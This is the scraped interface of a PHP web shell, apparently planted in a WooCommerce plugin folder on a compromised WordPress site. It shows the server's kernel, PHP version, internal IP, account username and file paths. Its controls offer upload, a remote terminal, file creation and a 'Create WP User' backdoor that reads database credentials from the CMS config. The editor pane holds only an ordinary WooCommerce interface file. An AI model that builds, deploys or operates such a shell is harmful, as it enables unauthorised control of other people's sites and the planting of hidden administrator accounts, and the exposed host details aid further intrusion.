Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
src
/
Internal
/
ProductFeed
/
Integrations
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
POSCatalog
[目录]
drwxr-xr-x
2026-03-03 00:17
IntegrationInterface.php
2.06 KB
-rw-r--r--
2026-03-03 00:17
IntegrationRegistry.php
1.30 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
IntegrationInterface.php
<?php /** * Interface that should be implemented by all provider integrations. * * @package Automattic\WooCommerce\Internal\ProductFeed */ declare(strict_types=1); namespace Automattic\WooCommerce\Internal\ProductFeed\Integrations; use Automattic\WooCommerce\Internal\ProductFeed\Feed\FeedInterface; use Automattic\WooCommerce\Internal\ProductFeed\Feed\FeedValidatorInterface; use Automattic\WooCommerce\Internal\ProductFeed\Feed\ProductMapperInterface; if ( ! defined( 'ABSPATH' ) ) { exit; } /** * IntegrationInterface * * @since 10.5.0 */ interface IntegrationInterface { /** * Get the ID of the provider. * * @return string The ID of the provider. */ public function get_id(): string; /** * Register hooks for the integration. * * @return void */ public function register_hooks(): void; /** * Activate the integration. * * This method is called when the plugin is activated. * If there is ever a setting that controls active integrations, * this method might also be called when the integration is activated. * * @return void */ public function activate(): void; /** * Deactivate the integration. * * This method is called when the plugin is deactivated. * If there is ever a setting that controls active integrations, * this method might also be called when the integration is deactivated. * * @return void */ public function deactivate(): void; /** * Get the query arguments for the product feed. * * @see wc_get_products() * @return array The query arguments. */ public function get_product_feed_query_args(): array; /** * Create a feed that is to be populated. * * @return FeedInterface The feed. */ public function create_feed(): FeedInterface; /** * Get the product mapper for the provider. * * @return ProductMapperInterface The product mapper. */ public function get_product_mapper(): ProductMapperInterface; /** * Get the feed validator for the provider. * * @return FeedValidatorInterface The feed validator. */ public function get_feed_validator(): FeedValidatorInterface; }
关闭
保存